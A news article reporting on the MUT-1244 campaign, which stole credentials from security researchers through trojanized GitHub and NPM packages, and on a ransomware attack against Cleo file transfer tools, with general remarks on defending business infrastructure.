The year of the cyber attack apparently won’t end quietly.
For example, a report Friday (December 13) by Ars Technica covers a year-long attack that stole credentials from both “malicious and benevolent” security personnel by infecting them with Trojan versions of open source GitHub and NPM software.
According to the report, this campaign has been reported by security companies Checkmarx and Datadog Security Labs, with hackers infecting the devices of researchers in security and other tech domains.
The hackers have yet to be identified, the report said, although Datadog researchers have named them MUT-1244. (MUT is an abbreviation for “mysterious, unattributed threat.”)
These hackers, the report said, install a professionally developed backdoor that ensures its presence is masked. They also used spearphishing campaigns aimed at thousands of researchers publishing articles on the arXiv platform.
According to the report, the hackers appear to have more than one goal. One of these is to collect SSH private keys, Amazon Web Services access keys, command histories, and other sensitive information from infected devices.
At the time Ars Technica published its report, dozens of machines were still infected, with one Dropbox account providing 390,000 login credentials for WordPress websites stolen by the hackers. The malware involved in the attacks also installs crypto mining software that was found on at least 68 machines last month, the report said.
These attacks are part of a wave of similar incidents this year at companies in various sectors. For example, PYMNTS wrote last week about a ransomware attack on Cleo’s LexiCom, VLTransfer and Harmony enterprise file transfer tools, underscoring the urgent need to secure key corporate infrastructure that handles sensitive data.
“Critical business infrastructurein particular, its many elements exposed to the Internet are attractive targets for attackers,” said that report. “That makes prevention and a versatile defense crucial. By understanding the vulnerabilities of enterprise software tools and implementing security measures, companies protect their data and mitigate the risks associated with data breaches.”
Several factors played a role in the Cleo incident. First, enterprise file transfer tools often have extensive permissions and access rights that span networks. Furthermore, these systems typically process large amounts of sensitive data, making them a prime target for extortion attempts. And finally, many organizations rely on outdated file transfer infrastructure, which may not receive regular security updates.
